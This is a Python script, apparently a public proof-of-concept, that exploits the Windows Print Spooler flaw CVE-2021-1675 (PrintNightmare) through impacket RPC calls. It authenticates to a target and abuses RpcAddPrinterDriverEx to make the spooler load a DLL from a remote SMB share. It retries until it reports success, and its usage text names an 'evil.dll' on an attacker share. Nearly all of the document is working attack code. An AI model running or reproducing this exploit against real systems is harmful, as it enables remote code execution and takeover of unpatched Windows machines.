#!/usr/bin/python3 from impacket.dcerpc.v5 import rprn from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5.dtypes import NULL import argparse import sys import time def connect(username, password, domain, lmhash, nthash, address, port): binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) rpctransport = transport.DCERPCTransportFactory(binding) rpctransport.set_dport(port) rpctransport.setRemoteHost(address) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(username, password, domain, lmhash, nthash) print("[*] Connecting to {0}".format(binding)) try: dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(rprn.MSRPC_UUID_RPRN) except: print("[-] Connection Failed") sys.exit(1) print("[+] Bind OK") return dce def main(username, password, domain, lmhash, nthash, address, port, share): #connect dce = connect(username, password, domain, lmhash, nthash, address, port) #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 container_info['DriverInfo']['tag'] = 2 container_info['DriverInfo']['Level2']['cVersion'] = 3 container_info['DriverInfo']['Level2']['pName'] = "1234\x00" container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 #handle = "\\\\{0}\x00".format(address) handle = NULL filename = share.split("\\")[-1] print("[*] Uploading {0}".format(share)) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) for i in range(1, 50): try: container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) if (resp['ErrorCode'] == 0): print("[+] Exploit Completed") sys.exit() except Exception as e: #print(e) pass if __name__ == '__main__': parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog=""" Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group = parser.add_argument_group('connection') group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If omitted it will use whatever was specified as target. ' 'This is useful when target is the NetBIOS name and you cannot resolve it') group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port", help='Destination port to connect to SMB Server') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( options.target).groups('') #In case the password contains '@' if '@' in address: password = password + '@' + address.rpartition('@')[0] address = address.rpartition('@')[2] if options.target_ip is None: options.target_ip = address if domain is None: domain = '' if password == '' and username != '' and options.hashes is None: from getpass import getpass password = getpass("Password:") if options.hashes is not None: lmhash, nthash = options.hashes.split(':') else: lmhash = '' nthash = '' #re-run if stage0/stageX fails print("[*] Try 1...") main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) time.sleep(10) print("[*] Try 2...") main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) time.sleep(10) print("[*] Try 3...") main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)